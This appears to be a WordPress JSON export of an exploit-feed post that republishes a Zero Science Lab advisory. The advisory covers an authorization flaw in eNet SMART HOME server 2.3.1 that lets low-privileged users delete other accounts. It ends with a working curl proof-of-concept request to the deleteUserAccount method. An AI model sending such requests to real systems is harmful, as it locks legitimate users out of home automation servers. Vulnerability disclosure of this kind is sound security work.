{"id":40931,"date":"2026-02-14T21:50:16","date_gmt":"2026-02-14T21:50:16","guid":{"rendered":"http:\/\/localhost\/?p=40931"},"modified":"2026-02-14T21:50:16","modified_gmt":"2026-02-14T21:50:16","slug":"enet-smart-home-server-231-deleteuseraccount-arbitrary-user-deletion","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40931","title":{"rendered":"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973"},"content":{"rendered":"

{“lastseen”:”2026-02-15T03:15:24″,”description”:”Title: eNet SMART HOME server 2.3.1 deleteUserAccount Arbitrary User Deletion Advisory ID: ZSL-2026-5973 Type: Local\/Remote Impact: Denial of Service, Privilege Escalation, Security Bypass Risk: 4\/5 Release Date: 14.02.2026 Summary Two German…”,”published”:”2026-02-14T00:00:00″,”modified”:”2026-02-14T00:00:00″,”type”:”zeroscience”,”title”:”eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion”,”source”:””,”references”:””,”id”:”ZSL-2026-5973″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”\\u003chtml\\u003e\\u003cbody\\u003e\\u003cp\\u003eeNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion\\r\\n\\r\\n\\r\\nVendor: Gira Giersiepen GmbH \\u0026amp; Co. KG | ALBRECHT JUNG GmbH \\u0026amp; Co. KG | Insta GmbH\\r\\nProduct web page: https:\/\/www.enet-smarthome.com\\r\\nAffected version: 2.3.1 (46841)\\r\\n 2.2.1 (46056)\\r\\n\\r\\nSummary: Two German specialists in building systems technology are jointly bringing\\r\\na new, wireless-based smart home system to the market. Gira and JUNG are the companies\\r\\nbehind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing\\r\\nthe system. All three of us are old hands when it comes to building automation, and\\r\\nhave a history of connecting buildings in an intelligent way that goes back as far as\\r\\nthe 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and\\r\\nfounded EIBA (now known as KNX). KNX is the first open global standard for home and\\r\\nbuilding automation. Through KNX, we have decisively shaped the development of intelligent\\r\\nbuilding systems technology \u2013 and this wealth of experience has now come together in\\r\\neNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and\\r\\noffers end customers the basis for an easy-to-use and secure Smart Home and installation\\r\\nengineers easily understandable and professional commissioning of the system.\\r\\n\\r\\nDesc: The eNet Smart Home system contains an authorization weakness in the deleteUserAccount\\r\\nJSON-RPC method that permits any authenticated low-privileged user (UG_USER) to delete\\r\\narbitrary user accounts, except for the built-in admin account. The application does not\\r\\nenforce proper role-based access control on this function, allowing a standard user to\\r\\nsubmit a crafted request specifying another username and have that account removed without\\r\\nelevated permissions or additional confirmation. This enables unauthorized user management\\r\\nactions, leading to denial of service against legitimate users, disruption of operations,\\r\\nand potential concealment of malicious activity.\\r\\n\\r\\nTested on: GNU\/Linux 4.4.15 (ARMv7 revision 5)\\r\\n Jetty(9.2.z-SNAPSHOT)\\r\\n\\r\\n\\r\\nVulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\r\\n @zeroscience\\r\\n\\r\\n\\r\\nAdvisory ID: ZSL-2026-5973\\r\\nAdvisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2026-5973.php\\r\\n\\r\\n\\r\\n07.02.2026\\r\\n\\r\\n–\\r\\n\\r\\n\\r\\n$ curl -X POST \\”http:\/\/TARGETIP:8080\/jsonrpc\/management\\” \\\\\\r\\n -H \\”Content-Type: application\/json\\” \\\\\\r\\n -H \\”Referer: http:\/\/TARGETIP:8080\/serverconfiguration.html?icp=kRuUFOgUoCnHeaHZ5P1m\\” \\\\\\r\\n -H \\”Cookie: INSTASESSIONID=2txt9zmzo8ij3cfdyagulvb7s\\” \\\\\\r\\n –data ‘{\\”jsonrpc\\”:\\”2.0\\”, \\”method\\”:\\”deleteUserAccount\\”, \\”params\\”:{\\”userName\\”:\\”testingus\\”}, \\”id\\”:\\”6\\”}’\\r\\n\\u003c\/p\\u003e\\u003c\/body\\u003e\\u003c\/html\\u003e”,”sourceHref”:”http:\/\/zeroscience.mk\/codes\/enet_usrdel.txt”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”http:\/\/zeroscience.mk\/en\/vulnerabilities\/ZSL-2026-5973.php”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-15T03:15:24″,”description”:”Title: eNet SMART HOME server 2.3.1 deleteUserAccount Arbitrary User Deletion Advisory ID: ZSL-2026-5973 Type: Local\/Remote Impact: Denial of Service, Privilege Escalation, Security Bypass Risk: 4\/5…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,7,11,5,107],"class_list":["post-40931","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability","tag-zeroscience"],"yoast_head":"\neNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40931\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-15T03:15:24″,”description”:”Title: eNet SMART HOME server 2.3.1 deleteUserAccount Arbitrary User Deletion Advisory ID: ZSL-2026-5973 Type: Local\/Remote Impact: Denial of Service, Privilege Escalation, Security Bypass Risk: 4\/5...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40931\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-14T21:50:16+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40931#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40931\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973\",\"datePublished\":\"2026-02-14T21:50:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40931\"},\"wordCount\":610,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\",\"zeroscience\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40931#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40931\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40931\",\"name\":\"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-14T21:50:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40931#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40931\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40931#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40931","og_locale":"en_US","og_type":"article","og_title":"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973 - zero redgem","og_description":"{“lastseen”:”2026-02-15T03:15:24″,”description”:”Title: eNet SMART HOME server 2.3.1 deleteUserAccount Arbitrary User Deletion Advisory ID: ZSL-2026-5973 Type: Local\/Remote Impact: Denial of Service, Privilege Escalation, Security Bypass Risk: 4\/5...","og_url":"https:\/\/zero.redgem.net\/?p=40931","og_site_name":"zero redgem","article_published_time":"2026-02-14T21:50:16+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40931#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40931"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973","datePublished":"2026-02-14T21:50:16+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40931"},"wordCount":610,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","Security","tapic","Vulnerability","zeroscience"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40931#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40931","url":"https:\/\/zero.redgem.net\/?p=40931","name":"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-14T21:50:16+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40931#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40931"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40931#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion_ZSL-2026-5973"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40931","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40931"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40931\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40931"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40931"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}